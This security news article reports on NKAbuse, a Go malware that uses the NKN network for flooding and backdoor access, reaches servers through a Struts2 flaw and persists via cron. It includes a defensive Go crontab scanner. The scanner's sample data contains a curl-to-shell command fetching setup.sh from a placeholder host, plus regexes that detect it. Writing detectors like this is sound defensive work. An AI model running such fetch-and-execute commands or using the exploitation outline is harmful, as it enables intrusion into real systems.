New NKAbuse malware exploits NKN decentralized P2P network protocol
December 16, 2023
Experts have discovered a new Go-based multiplatform malware tracked as NKAbuse. This is the first malware to exploit NKN technology.
Researchers from Kaspersky Lab’s Global Emergency Response Team (GERT) and GReAT have discovered a new multiplatform malware called NKAbuse. The malicious code is written in Go, and it is the first malware to rely on NKN technology for data exchange between peers. It can target a variety of architectures and supports both flooder and backdoor functionality.
NKAbuse’s primary target is Linux desktops, but it can also target MIPS and ARM architectures.
NKN (New Kind of Network) is a decentralized peer-to-peer network protocol that relies on blockchain technology. This protocol enables secure and low-cost data transfer. It is designed to address the limitations of the current Internet infrastructure, which is centralized, inefficient, and prone to censorship.
Individuals can voluntarily join the NKN network and run nodes; the network currently consists of over 60,000 nodes.
“Historically, malware operators have exploited emerging communication protocols like NKN to link with command and control servers (C2) and botmasters,” reads the report published by Kaspersky. “This threat exploits the NKN public blockchain protocol to perform large-scale flooding attacks and act as a backdoor within Linux systems.”
Experts believe the attackers targeted financial companies by exploiting an old Struts2 vulnerability tracked as CVE-2017-5638.
An attacker could exploit this vulnerability to execute commands on the server by passing them in a header labeled “shell”, which the exploit hands to Bash for execution. Successful exploitation runs commands on the system and downloads the initial script.
Researchers found that the malware lacks a self-propagation mechanism, meaning the initial infection is delivered by exploiting a vulnerability in the deployed application.
Attackers typically install the malware by running a remote shell script that downloads and executes the contents of a setup.sh script hosted on a remote server. The script checks the OS type and launches the second-stage malware (“app_linux_{ARCH}”), the actual implant, which is hosted on the same server. The samples discovered by Kaspersky support the following architectures:
- 386
- arm64
- arm
- amd64
- mips
- mipsel
- mips64
- mips64el
NKAbuse uses cron jobs to maintain persistence.
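As an added illustration (not code from the Kaspersky report or from this article), here is a small Go triage helper that scans crontab entries for the two indicators described above: the second-stage implant name app_linux_{ARCH}, using the architecture list from the report, and a remote setup.sh fetched and piped into a shell. The sample crontab lines and the host name placeholder are constructed; real hunting would read /etc/cron* and per-user crontabs.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Architectures listed in the report for the second-stage implant "app_linux_{ARCH}".
var implantArches = []string{"386", "arm64", "arm", "amd64", "mips", "mipsel", "mips64", "mips64el"}

// implantRe matches the implant naming convention; the trailing \b keeps
// "app_linux_arm" from matching an unrelated "app_linux_armory".
var implantRe = regexp.MustCompile(`\bapp_linux_(` + strings.Join(implantArches, "|") + `)\b`)

// downloaderRe matches "fetch a remote setup.sh and pipe it into a shell".
// No host is hard-coded, because the article names none.
var downloaderRe = regexp.MustCompile(`(curl|wget)\b[^|;]*setup\.sh[^|;]*\|\s*(ba)?sh\b`)

// Finding is one flagged crontab entry and the reason it was flagged.
type Finding struct {
	Line   string
	Reason string
}

// ScanCrontab returns the entries that match either indicator; comments and blank lines are skipped.
func ScanCrontab(lines []string) []Finding {
	var out []Finding
	for _, raw := range lines {
		line := strings.TrimSpace(raw)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		// Strip the schedule (five fields, or an @reboot-style keyword) so only the command is inspected.
		f := strings.Fields(line)
		cmd := line
		if strings.HasPrefix(line, "@") && len(f) > 1 {
			cmd = strings.Join(f[1:], " ")
		} else if !strings.HasPrefix(line, "@") && len(f) > 5 {
			cmd = strings.Join(f[5:], " ")
		}
		switch {
		case implantRe.MatchString(cmd):
			out = append(out, Finding{raw, "implant name: " + implantRe.FindString(cmd)})
		case downloaderRe.MatchString(cmd):
			out = append(out, Finding{raw, "remote setup.sh piped into a shell"})
		}
	}
	return out
}

func main() {
	sample := []string{ // constructed entries; EXAMPLE-HOST-PLACEHOLDER stands in for any host
		"# m h dom mon dow command",
		"0 3 * * * /usr/bin/backup.sh",
		"@reboot /tmp/.x/app_linux_amd64",
		"*/5 * * * * curl -s http://EXAMPLE-HOST-PLACEHOLDER/setup.sh | sh",
		"0 * * * * /opt/app_linux_armory --check",
	}
	for _, hit := range ScanCrontab(sample) {
		fmt.Printf("%-62s %s\n", hit.Line, hit.Reason)
	}
}
```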
This malware supports multiple distributed denial of service (DDoS) attacks. Below is the list of flood payloads, indexed by command number.

| Command | Attack |
| --- | --- |
| Default/0 | http_flood_HTTPGetFloodPayload |
| 1 | http_flood_HTTPPostFloodPayload |
| 2 | tcp_flood_TCPFloodPayload |
| 3 | udp_flood_UDPFloodPayload |
| 4 | ping_flood_PINGFloodPayload |
| 5 | tcp_syn_flood_TCPSynFloodPayload |
| 6 | ssl_flood_SSLFloodPayload |
| 7 | http_slowloris_HTTPSlowlorisPayload |
| 8 | http_slow_body_HTTPSlowBodyPayload |
| 9 | http_slow_read_HTTPSlowReadPayload |
| 10 | icmp_flood_ICMPFloodPayload |
| 11 | dns_nxdomain_DNSNXDOMAINPayload |
NKAbuse also supports multiple backdoor features that turn it into a powerful remote access Trojan (RAT).
“Although relatively rare, new cross-platform flooders and backdoors like NKAbuse stand out by utilizing less common communication protocols. While it appears to have been carefully crafted, it can also be adapted to function as a backdoor on certain hosts,” the report concludes. “Furthermore, the use of blockchain technology ensures both authenticity and anonymity. This indicates the potential for this botnet to grow steadily over time, seemingly without an identifiable central controller.”